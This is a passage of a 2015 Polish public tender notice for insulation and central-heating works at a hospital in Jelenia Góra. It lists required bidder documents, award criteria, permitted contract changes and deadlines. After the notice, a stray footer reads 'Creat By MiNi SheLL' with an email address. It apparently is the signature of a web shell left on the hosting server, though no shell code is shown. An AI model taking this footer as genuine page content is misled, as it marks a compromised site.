<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda:
(a)	pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( w oryginale) - wg wzoru stanowiącego załącznik nr 7;

(b)	Informację banku  lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającą  wysokość posiadanych środków finansowych lub zdolność kredytową  tego podmiotu , wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert  - jeżeli udostępnia zasoby w tym zakresie, 


(c)	wykazu robót budowlanych wykonanych (zakończonych) oraz nie wykonanych lub wykonanych nienależycie przez _inny podmiot_,w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów określających, że roboty te zostały wykonane w sposób należyty oraz wskazujących że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Wykaz   dotyczy   wyłącznie wszystkich robót   budowlanych  związanych   z ociepleniem budynku wraz                         z  elewacją, związanych  z instalacją centralnego ogrzewania w budynku  - jeżeli udostępnia zasoby w tym zakresie,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Za okna o współczynniku przenikania ciepła max U= 1,1 W/m2 K - 2</li>
<li>3 - Za świetliki o współczynniku przenikania ciepła max U= 1,3 W/m2 K - 1</li>
<li>4 - Za skrócenie terminu zgłoszenia gotowości do rozpoczęcia prac odbiorowych o co najmniej 21 dni - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :
  1.1   zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na    osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Rozdz. I IDW,
  1.2    zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy lub dalszego podwykonawcy,
  1.3  rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia wraz z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony przed podpisaniem umowy  kosztorys ofertowy lub kalkulację wyceny, 
     1.4  wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w  trakcie realizacji prac, których zakres rzeczowy nie wykracza poza zakres opisany                         w Dokumentacji projektowej, nie powodujących zmiany umownej ceny,
1.5	    wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych (siła wyższa) uniemożliwiających wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach,
1.6	   konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych, technologicznych            lub materiałowych niż wskazane w Dokumentacji projektowej  w sytuacji,  gdyby zastosowanie dotychczasowych rozwiązań groziło nie wykonaniem lub wadliwym  wykonaniem projektu - dotyczy możliwości  wydłużenia terminu realizacji zakończenia i/lub zmiany wynagrodzenia na zasadach określonych     w punktach  1.3,  1.4, 
1.7	zmiany terminów określonych w Harmonogramie rzeczowo-finansowym,  gdy niedotrzymanie terminu  wynika z udokumentowanego działania Siły Wyższej; zawieszenia Robót; zmiany Przepisów Prawa, wpływającej sposób istotny i bezpośredni na wykonywanie Robót, których nie można było przewidzieć w chwili składania Oferty Wykonawcy, pomimo dołożenia należytej staranności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.jgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej, w wersji papierowej- w ciągu 5dni od daty złożenia wniosku z dołączonym dowodem wpłaty 200zł na konto Zamawiającego (jak dla wadium),z adnotacją: SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2015 godzina 10:00, miejsce: Sekretariat Wojewódz. Centrum Szpitalnego Kotliny Jeleniogórskiej, 58-506 Jelenia Góra,ul.Ogińskiego 6, budynek D parter- strona prawa, segment administracja,pokój 171 lub przesłać na adres jw.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania o udzielenia zamówienia publicznego w okolicznościach, o których mowa w art.24 ust.2 pkt 5) upzp oraz wykonawcy, których  Zamawiający nie wykluczy z postępowania  o udzielenie zamówienia publicznego za to, że w okresie 3lat przed wszczęciem postępowania, w sposób zawiniony wykonawca poważnie naruszył   obowiązki  zawodowe, w szczególności, gdy wykonawca w wyniku      
zamierzonego działania lub rażącego niedbalstwa nie wykonał  lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych ( art.24 ust.2a. upzp).

Termin zakończenia przez Wykonawcę robót i czynności będących przedmiotem zamówienia tj. termin zgłoszenia gotowości do rozpoczęcia czynności odbiorowych został ustalony maksymalnie do 10.10.2015 r. 
Termin zakończenia zadania ustalono poprzez dodanie do ww. terminu  14 dni przeznaczonych na czynności odbiorowe. Wykonawca otrzyma punkty za skrócenie terminu, jeżeli  poda termin zgłoszenia do rozpoczęcia czynności odbiorowych  nie później niż 19.09.2015 r. (włącznie)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com